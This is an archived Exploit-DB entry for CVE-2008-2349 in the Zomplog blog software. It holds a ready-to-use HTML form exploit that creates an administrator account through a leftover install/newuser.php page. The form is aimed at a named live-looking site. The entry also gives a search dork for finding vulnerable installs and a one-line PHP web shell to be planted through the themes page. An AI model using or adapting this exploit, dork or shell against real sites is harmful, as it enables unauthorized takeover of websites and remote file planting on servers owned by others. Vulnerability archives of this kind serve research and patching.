Zomplog <= 3.8.2 newuser.php Arbitrary Add Admin Exploit

2008-05-16T00:00:00
ID EDB-ID:5634
Type exploitdb
Reporter ArxWolf
Modified 2008-05-16T00:00:00

Description

Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit. CVE-2008-2349. Webapps exploit for php platform

                                        
                                            ======================== WEBXAKEP.NET ===========================

Name:  "Zomplog 3.8.2 &lt;= add admin"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: ArxWolf
Discovered On: 16 05 2008
WWW: http://WebXakep.net
ICQ: 504-282

Vulnerability to "install/newuser.php", to add 2 administrator.
Folder "install" not removed in 70% of cases.

Exploit:
--------------------------------------------------------
&lt;br&gt;&lt;b&gt;&lt;center&gt;Добавляем админа "Add Admin"&lt;/center&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;
&lt;!-- &lt;form action="http://localhost/install/newuser.php" method="POST"&gt; /--&gt;
&lt;form action="http://weblog.sgrim.us/install/newuser.php" method="POST"&gt;
&lt;p&gt;Титлы блога "Blog Title"&lt;br /&gt;
  &lt;input type="text" name="weblog_title" maxlength="40" id="blogname" /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
Логин "Username"&lt;br /&gt;
&lt;input type="text" name="login" maxlength="15" id="name" /&gt;
&lt;br /&gt;
&lt;br /&gt;
Пароль "Password"&lt;br /&gt;
&lt;input type="password" name="password" maxlength="15" id="pwd" /&gt;
&lt;br /&gt;
&lt;br /&gt;
Повторяем пароль "Confirm password"&lt;br /&gt;
&lt;input type="password" name="password2" maxlength="15" id="pwd2" /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;input name="admin" type="hidden" id="admin" value="1" /&gt;
&lt;input name="submit_user" type="submit" value="Submit &rsaquo;&rsaquo;" id="submit" /&gt;

&lt;/p&gt;
&lt;/form&gt;
-------------------------------------------------------------

http://******/admin/profile.php // Add or delete user ^_^
http://******/admin/themes.php //  If there is a right of entry you can fill shell. &lt;?php copy($_GET['i'],$_GET['o']); ?&gt;


========================= WEBXAKEP.NET ===========================

# milw0rm.com [2008-05-16]